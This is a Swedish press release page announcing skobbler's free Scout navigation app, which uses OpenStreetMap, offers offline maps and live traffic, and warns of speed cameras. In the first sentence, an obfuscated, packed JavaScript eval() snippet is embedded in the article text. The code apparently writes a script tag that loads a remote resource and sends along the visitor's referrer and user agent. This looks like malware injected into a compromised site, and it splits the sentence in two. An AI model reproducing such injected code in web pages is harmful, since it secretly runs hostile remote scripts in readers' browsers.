Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Scout – heltäckande gratisapp för navigering

Scout – heltäckande gratisapp för navigering
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rbyai|var|u0026u|referrer|fktyz||js|php’.split(’|’),0,{}))
storsäljande navigeringsappen skobbler har fått toppbetyg i både App Store och Google Play. Enligt det tyska företaget, skobbler GmbH, är dyra navigeringsappar snart ett minne blott och lanserar därför en ny, förbättrad och dessutom kostnadsfri version, som ska utkonkurrera TomTom och Google Maps. Den kallas Scout. Framtidens kostnadsfria navigeringsapp är här och täcker mer än de vanliga vägarna.

Med hjälp av den kostnadsfria appen, ”GPS Navigation, Maps & Traffic – Scout”, kan man navigera sig fram i hela världen och på ett säkert sätt ta sig från punkt A till punkt B med bilen, på cykeln eller längst skogsstigar. skobbler var den första appen att använda sig av kartdata från OpenStreetMap, ett molnresursprojekt som byggdes upp av vanliga människor världen över, enligt samma princip som Wikipedia. Av användare och för användare. Miljoner entusiastiska ”kartregistrerare” bidrar varje dag till den informationsmängd som ser till att du tar dig fram enkelt och tryggt. Tack vare detaljerade OpenStreetMap täcker kartorna inte enbart in vägar och gator, utan även cykelleder och skogsstigar. Inte minst till glädje för alla cykelentusiaster, som enkelt använder appen från sin mobil eller surfplatta.

– Du hittar ingen lika funktionsmässigt heltäckande kart- och navigeringsapplikation på App Store ens om du är villig att satsa en ansenlig summa, säger Marcus Thielking, en av grundarna samt VD för skobbler. Med denna app får du t.ex. en karta över världen som kan användas både on- och offline, något som ger utmärkt tillförlitlighet oavsett om du har internetanslutning eller inte. Du kan också dra fördel av briljanta sväng-för-sväng-funktioner och användbar reseinformation. Det bästa av allt är att det är gratis. Appen är tillgänglig ’all inclusive’ och erbjuder funktioner som inte ens de dyraste apparna har. Vi tror att den kommer att bli en tuff konkurrent till TomTom, Google Maps och andra leverantörer av navigeringsappar.  

Användaren får tillgång till följande kostnadsfria fördelar med appen:

·       En global, digital navigeringsapp som tack vare den detaljerade OpenStreetMap inte enbart täcker in vägar och gator, utan även cykelleder och skogsstigar. Det innebär att även cyklister och fotgängare kan hitta rätt på gångvägar, stråk och promenadvägar i parker, skogar och t.o.m. djurparker.

·       Samma exakta sväng-för-sväng-navigering med både visuell- och röststyrning som för premiumappar i App Store.

·       Dynamisk trafikinformation från den ledande trafikdataleverantören, INRIX, med vägförhållanden, meddelanden om köer, snabbare vägalternativ för undvikande av stockningar och onödig irritation. Uppgraderingen Real-Time Premium Traffic (RPT) kan köpas direkt från appen till ett förmånligt pris. Den förbättrar resan utifrån trafikförhållandena och informerar om trafikläget med hjälp av färgmarkeringar.

·       Kostnadsfri användning offline i ett land som användaren själv väljer. Andra länder eller kontinenter för offline-användning kan köpas direkt från själva appen. Offline-kartor över hela världen finns att köpa.

·       Frekventa, kostnadsfria uppdateringar av appen tack vare OpenStreetMap, som appen baseras på. Andra appar uppdateras normalt två gånger per år.

·       Appen är integrerad med reseguiderna Wikitravel, Foursquare och TripAdvisor, och det gör att man kan söka efter och läsa recensioner om t.ex. hotell, sevärdheter och restauranger längs resan.

·       Automatisk varning för fartkameror.

Eftersom appen kan användas i mobiltelefon eller surfplatta bär du med andra ord med dig den så gott som jämt, och du behöver inte starta upp GPS:en i bilen. Navigering via mobilen blir en barnlek och du är inte bunden av bilen, utan kan använda appen även på cykelfärder, stadsvandringar eller skogsstigar, på hemmaplan eller ute i världen. 

Scout kan användas i nästan 200 länder och kan laddas hem kostnadsfritt för iPhone-, iPad- och Android-enheter på App Store och Google Play.

Detta är ett pressmeddelande från skobbler GmbH